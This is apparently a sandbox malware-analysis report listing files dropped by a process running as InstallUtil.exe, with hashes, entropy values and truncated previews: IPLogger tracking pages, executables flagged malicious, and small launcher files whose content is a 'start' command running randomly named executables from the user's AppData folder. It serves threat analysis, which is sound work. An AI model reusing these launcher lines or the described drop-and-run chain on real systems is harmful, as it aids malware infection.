                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.76847572306794
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:tnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHS:EWqlkLESgCRE/vhOjb05efd6e/oXHS
                                                                                                                          MD5:F5F08291B2237B4B9F06EC773F832097
                                                                                                                          SHA1:36EEC8A57430D96715325ECEB51D89FBB0FA2E6B
                                                                                                                          SHA-256:6998173E548E3563A7EF620CE6D7F23B16DC13D59B9C1CA555B7B5FBF602B2B7
                                                                                                                          SHA-512:6DCDA22E53129C724EAE243599756E070B48CA5CA9729013F055C51D52FBD273C669D8F830C8F53CB54F8A81785E3DABDAE14B505782CC635BF7673C504689BC
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......5-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 175104
Entropy (8bit): 6.135102131058025
Encrypted: false
SSDEEP: 3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
MD5: 89B400AF781E7D55812A77260DC1D9C8
SHA1: 36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
SHA-256: 04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
SHA-512: AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
Malicious: true
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category: dropped
Size (bytes): 7446
Entropy (8bit): 5.422209848736349
Encrypted: false
SSDEEP: 192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5: 5B423612B36CDE7F2745455C5DD82577
SHA1: 0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256: E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512: C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious: false
Preview: <!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 2960760
Entropy (8bit): 7.768475849065428
Encrypted: false
SSDEEP: 49152:UnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHv:nWqlkLESgCRE/vhOjb05efd6e/oXHv
MD5: F37E2C706ECC3EF58CF49BED13986A56
SHA1: 20938AFE51AA8320DDE1F5D6133BB0BD2CD5BA81
SHA-256: 6936C72C8E6387A73F42768A9325FC546C382CC1024F70C33A558B36F5BDA971
SHA-512: A45F7192B0F668DDCCFF6F9EBFD5E24AD3A8B63CD285E090750940346FA06E1320B35AFCBAFFA89D80D6D05E2191A862BB3817224F321CF1C0D2493E5D9B1F0F
Malicious: true
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 2146090
Entropy (8bit): 7.982011327302058
Encrypted: false
SSDEEP: 49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
MD5: 0D69DD3893505245669619A06840C2FE
SHA1: 4B62A51FFB4E5355D61F95962DAD44A97936FDB6
SHA-256: CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
SHA-512: 650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
Malicious: true
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 2960760
Entropy (8bit): 7.768479757261426
Encrypted: false
SSDEEP: 49152:1nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHa:sWqlkLESgCRE/vhOjb05efd6e/oXHa
MD5: A0D1C072888977A5E55107B2D2F98FAF
SHA1: A2F814E9731FFD69DAD8411F7CFB16B3D2DD854E
SHA-256: 6700F95EA178FA72785C2D3D615FC4C4DB5662E0122CA3AF55ABE8869CE91CB8
SHA-512: 984B36DDE0C1C044A7FE70E089C81B63925B178644BE646653C1BB171EFD72EBF88BE5D6D67FE462A7AC976B58298E77DC5C164DC658E798635EF66D2BC56DC4
Malicious: true
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.798776903948292
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5W8AwuVEoOgjczRyLAdm:fE1923WRgEc9yL
                                                                                                                          MD5:A699EACA4F99306D0614E5063FBA7DAD
                                                                                                                          SHA1:31CC176414DD6C53A0CE002C4B8F5BAC6DE7E60D
                                                                                                                          SHA-256:C1A993D88012F587BF1A244248E95D63E2B1A8C6965BB66F739BC21F39408A03
                                                                                                                          SHA-512:76CB7B6A16E7B2C645AAD1D488818533975B21AFD72632FB5C8A0E5C8376C9779B598F3D6118D462F429E6A6353139A94BC0C9DBFB9AD33FBD8BFCBBD3F952E1
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\s0seUKprDs1WGnkEHPu39VtW.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.90808382472548
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5vbVhpb7E0s:fE1923xhVM
                                                                                                                          MD5:B4DF76C0489E3537C1A2D91EE6367D88
                                                                                                                          SHA1:F9CEF8131C28138CA8E1D737C718A1B58776204C
                                                                                                                          SHA-256:67B6477995FD8FECC40D878C1DF181796138DAFBB09DF03909A81E35AF269BF9
                                                                                                                          SHA-512:3EFF34F20B931006C7BD7F81EE3788ED423BB1BBD898A520E9A1E6AE1B389A5B76AB762D8C9D2939CA863D9C1671477E90F4DAF5017DBB6D56D8E389E3E7B4F5
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\JPkWbPiELiY3dVd0ezptZ3ko.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.852367617155621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J59t8wWkYm:fE1923P8wWkP
                                                                                                                          MD5:B305CE8A067F711D4C4674EEB2C9CC32
                                                                                                                          SHA1:96A0753F39CFC23594EE2C66C5EC6CF47350924B
                                                                                                                          SHA-256:0985D2DFBCA27BC194CE563EBB8E3F116E168ED1AE4EF26F258D0E323271B226
                                                                                                                          SHA-512:91231D6FBA4E9F3F8127880EA13BC4110607399E5C3FCB792EC5E4EE7C8A2400D94772643B80ED9119D614CF7C2F2605D9FA15EF5035EBFAAB02FEF478057C18
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\XHapUUFNPyUhtn0ymqhPvOC6.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.068728288980289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5x2dIoUt:fE19230IoUt
                                                                                                                          MD5:708B7A006BA577A610568D98D86C6472
